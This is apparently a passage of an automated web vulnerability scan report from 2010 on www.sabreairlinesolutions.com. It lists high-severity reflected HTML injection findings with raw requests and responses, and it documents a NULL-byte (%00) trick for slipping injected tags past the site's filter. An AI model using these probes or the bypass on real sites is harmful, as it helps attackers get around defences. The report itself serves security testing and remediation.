Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d46ba"><a>f8bc401d242 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d46ba"><a>f8bc401d242 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/product_support_and_services?%00d46ba"><a>f8bc401d242=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321496; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A3%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:15:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321496; expires=Thu, 06-Oct-2011 10:15:38 GMT; path=/
Set-Cookie: exp_last_activity=1286378138; expires=Thu, 06-Oct-2011 10:15:38 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A1%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A4%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:15:59 GMT
Pragma: no-cache
Content-Length: 6746
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact/product_support_and_services?%00d46ba"><a>f8bc401d242=1">
...[SNIP]...

3.74. http://www.sabreairlinesolutions.com/home/contact/product_support_and_services [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/product_support_and_services

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %0059a0b<a>b4a625dc95a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 59a0b<a>b4a625dc95a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/product_support_and_services?%0059a0b<a>b4a625dc95a=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321496; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A3%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fabout%2Fmedia_press%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:18:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321496; expires=Thu, 06-Oct-2011 10:18:33 GMT; path=/
Set-Cookie: exp_last_activity=1286378312; expires=Thu, 06-Oct-2011 10:18:33 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A1%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A4%3Bs%3A31%3A%22%2Fabout%2Fcopyright_and_trademark%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:18:54 GMT
Pragma: no-cache
Content-Length: 6742
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>b4a625dc95a=1">product support and services?%0059a0b<a>b4a625dc95a=1</a>
...[SNIP]...

3.75. http://www.sabreairlinesolutions.com/home/contact/product_support_and_services/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/product_support_and_services/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00c2a4b<a>8c093d8e894 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c2a4b<a>8c093d8e894 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/product_support_and_services/?%00c2a4b<a>8c093d8e894=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/contact
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321412; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A2%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:00:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321412; expires=Thu, 06-Oct-2011 10:00:24 GMT; path=/
Set-Cookie: exp_last_activity=1286377224; expires=Thu, 06-Oct-2011 10:00:24 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A3%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:00:44 GMT
Pragma: no-cache
Content-Length: 6806
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>8c093d8e894=1">?%00c2a4b<a>8c093d8e894=1</a>
...[SNIP]...

3.76. http://www.sabreairlinesolutions.com/home/contact/product_support_and_services/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/product_support_and_services/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0072aaa"><a>a86720643c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 72aaa"><a>a86720643c4 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/product_support_and_services/?%0072aaa"><a>a86720643c4=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/contact
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321412; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A2%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:57:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321412; expires=Thu, 06-Oct-2011 09:57:20 GMT; path=/
Set-Cookie: exp_last_activity=1286377040; expires=Thu, 06-Oct-2011 09:57:20 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A3%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:57:35 GMT
Pragma: no-cache
Content-Length: 6810
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact/product_support_and_services/?%0072aaa"><a>a86720643c4=1">
...[SNIP]...

3.77. http://www.sabreairlinesolutions.com/home/contact/sabre_holdings_corporation [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/sabre_holdings_corporation

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00f3b04<a>52fec2027bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f3b04<a>52fec2027bf in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/sabre_holdings_corporation?%00f3b04<a>52fec2027bf=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321510; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fabout%2Fprivacy_policy%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:22:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321510; expires=Thu, 06-Oct-2011 10:22:11 GMT; path=/
Set-Cookie: exp_last_activity=1286378530; expires=Thu, 06-Oct-2011 10:22:11 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fcontact%2Fsabre_holdings_corporation%2F%22%3Bi%3A1%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A3%3Bs%3A22%3A%22%2Fabout%2Fprivacy_policy%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:22:24 GMT
Pragma: no-cache
Content-Length: 6801
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>52fec2027bf=1">sabre holdings corporation?%00f3b04<a>52fec2027bf=1</a>
...[SNIP]...

3.78. http://www.sabreairlinesolutions.com/home/contact/sabre_holdings_corporation [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/sabre_holdings_corporation

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009e7cd"><a>c340023f0cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9e7cd"><a>c340023f0cc in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/sabre_holdings_corporation?%009e7cd"><a>c340023f0cc=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321510; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fabout%2Fprivacy_policy%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:18:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321510; expires=Thu, 06-Oct-2011 10:18:26 GMT; path=/
Set-Cookie: exp_last_activity=1286378306; expires=Thu, 06-Oct-2011 10:18:26 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fcontact%2Fsabre_holdings_corporation%2F%22%3Bi%3A1%3Bs%3A25%3A%22%2Fcontact%2Fmedia_relations%2F%22%3Bi%3A2%3Bs%3A22%3A%22%2Fascend%2Fcurrent_issue%2F%22%3Bi%3A3%3Bs%3A22%3A%22%2Fabout%2Fprivacy_policy%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:18:47 GMT
Pragma: no-cache
Content-Length: 6805
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact/sabre_holdings_corporation?%009e7cd"><a>c340023f0cc=1">
...[SNIP]...

3.79. http://www.sabreairlinesolutions.com/home/contact/sabre_holdings_corporation/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/sabre_holdings_corporation/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %001509d"><a>ced17157749 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1509d"><a>ced17157749 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/sabre_holdings_corporation/?%001509d"><a>ced17157749=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/contact
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321465; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A3%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:56:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321465; expires=Thu, 06-Oct-2011 09:57:06 GMT; path=/
Set-Cookie: exp_last_activity=1286377026; expires=Thu, 06-Oct-2011 09:57:06 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fcontact%2Fsabre_holdings_corporation%2F%22%3Bi%3A1%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A4%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:57:26 GMT
Pragma: no-cache
Content-Length: 6867
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/home/contact/sabre_holdings_corporation/?%001509d"><a>ced17157749=1">
...[SNIP]...

3.80. http://www.sabreairlinesolutions.com/home/contact/sabre_holdings_corporation/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/contact/sabre_holdings_corporation/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %006b56e<a>b10196b1995 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6b56e<a>b10196b1995 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/contact/sabre_holdings_corporation/?%006b56e<a>b10196b1995=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/contact
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321465; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A3%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 10:00:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321465; expires=Thu, 06-Oct-2011 10:00:36 GMT; path=/
Set-Cookie: exp_last_activity=1286377236; expires=Thu, 06-Oct-2011 10:00:36 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A36%3A%22%2Fcontact%2Fsabre_holdings_corporation%2F%22%3Bi%3A1%3Bs%3A23%3A%22%2Fcontact%2Fproduct_sales%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A3%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3Bi%3A4%3Bs%3A24%3A%22%2Fabout%2Fthe_as_advantage%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 10:01:00 GMT
Pragma: no-cache
Content-Length: 6863
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a>b10196b1995=1">?%006b56e<a>b10196b1995=1</a>
...[SNIP]...

3.81. http://www.sabreairlinesolutions.com/home/includes/form_adi [height parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/includes/form_adi

Issue detail

The value of the height request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ada1d"><a>e10d4d698c6 was submitted in the height parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home/includes/form_adi?iframe=true&width=500&height=500ada1d"><a>e10d4d698c6 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
